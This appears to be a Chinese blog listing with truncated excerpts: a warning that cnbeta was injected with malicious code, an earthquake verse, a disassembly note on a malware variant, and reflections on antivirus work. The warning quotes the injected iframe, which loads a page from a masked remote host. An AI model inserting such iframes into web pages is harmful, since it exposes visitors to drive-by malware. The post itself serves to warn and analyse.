作者：清新阳光                                                            (

2008年6月8日晚20时左右发现cnbeta被挂马 在网页前面加入了如下代码：

<iframe src=http://www.******.info/hao4.htm width=100 height=1></iframe>    

请注意，暂时不要访问cnbeta~

突然

天摇地晃

沉默 随即是各种奔跑

醒悟 原来是地震来临

里氏7.8

作者：清新阳光                                                            (

作者：清新阳光                                                            (

作者：清新阳光                                                            (

作者：清新阳光                                                            (

作者：清新阳光                                                            (

昨天花了一晚上时间跟踪了磁碟机的新变种的主程序（setup.exe) 发现了原先没有发现的一些东西，做个笔记吧~~汇编刚开始学，还希望大牛们指导指导哈^_^

这里只写出原来没有分析出来的部分~~

00402111 |> /8D85 E4FEFFFF /LEA EAX,DWORD PTR SS:[EBP-11C]
00402117 |. |8D4D F0       |LEA ECX,DWORD PTR SS:[EBP-10]
0040211A |. |50            |PUSH EAX
0040211B |. |E8 32680000

作者：清新阳光                                                            (

作者：清新阳光                                                            (

作者：清新阳光                                                            (

　　看了小聪的"答阳光，关于pagefile.pif对付安全软件行为的实现举例"觉得自己实在是差距太大了。

　　曾经和他探讨过，反病毒道路上有几座山，第一座山是帮人看看日志，帮人处理处理问题，这充其量也就是算个小山头，聪明点的人估计有一个月就会了，而且这也不叫真正的反病毒，这叫客服；第二座山是装个虚拟机测测病毒，看看现象，这也不难，豁得出去时间，多练练也就OK了；第三座山则是真正的入行山，通过反汇编看代码分析病毒，从小聪的近来的文章可以发现，通过他自己不懈的努力，他已经可以看到这座山背

作者：清新阳光                                                            (

作者：清新阳光                                                            (